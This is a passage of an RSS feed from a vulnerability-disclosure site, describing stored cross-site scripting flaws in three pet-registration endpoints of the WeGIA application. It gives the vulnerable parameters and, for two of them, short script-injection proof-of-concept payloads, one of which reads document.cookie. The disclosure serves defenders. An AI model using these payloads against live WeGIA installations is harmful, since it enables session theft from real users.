&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53929-cross-site-scripting-xss-stored-endpoint-adicionar_corphp-parameter-cor&amp;#34;&amp;gt;CVE-2025-53929: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53929&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53929&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Trigger XSS: &amp;lt;code&amp;gt;/html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53929/image.png&amp;#34;
	width=&amp;#34;809&amp;#34;
	height=&amp;#34;498&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53929/image_hu_53ddbaf9c4cb2957.png 480w, /p/cve-2025-53929/image_hu_37121886be6a1b9a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;162&amp;#34;
		data-flex-basis=&amp;#34;389px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53930</title>
        <link>https://www.cvehunters.com/p/cve-2025-53930/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53930/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53930-cross-site-scripting-xss-stored-endpoint-adicionar_especiephp-parameter-especie&amp;#34;&amp;gt;CVE-2025-53930: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53930-cross-site-scripting-xss-stored-endpoint-adicionar_especiephp-parameter-especie&amp;#34;&amp;gt;CVE-2025-53930: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53930&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53930/image.png&amp;#34;
	width=&amp;#34;1325&amp;#34;
	height=&amp;#34;311&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53930/image_hu_e1e18487d5585a94.png 480w, /p/cve-2025-53930/image_hu_fad609f1d6c9aa79.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;426&amp;#34;
		data-flex-basis=&amp;#34;1022px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53930/image-1.png&amp;#34;
	width=&amp;#34;1268&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53930/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53930/image-1_hu_4cccc1269b2a5680.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;515&amp;#34;
		data-flex-basis=&amp;#34;1237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53931</title>
        <link>https://www.cvehunters.com/p/cve-2025-53931/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53931/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53931-cross-site-scripting-xss-stored-endpoint-adicionar_racaphp-parameter-raca&amp;#34;&amp;gt;CVE-2025-53931: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53931-cross-site-scripting-xss-stored-endpoint-adicionar_racaphp-parameter-raca&amp;#34;&amp;gt;CVE-2025-53931: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53931&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_raca.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
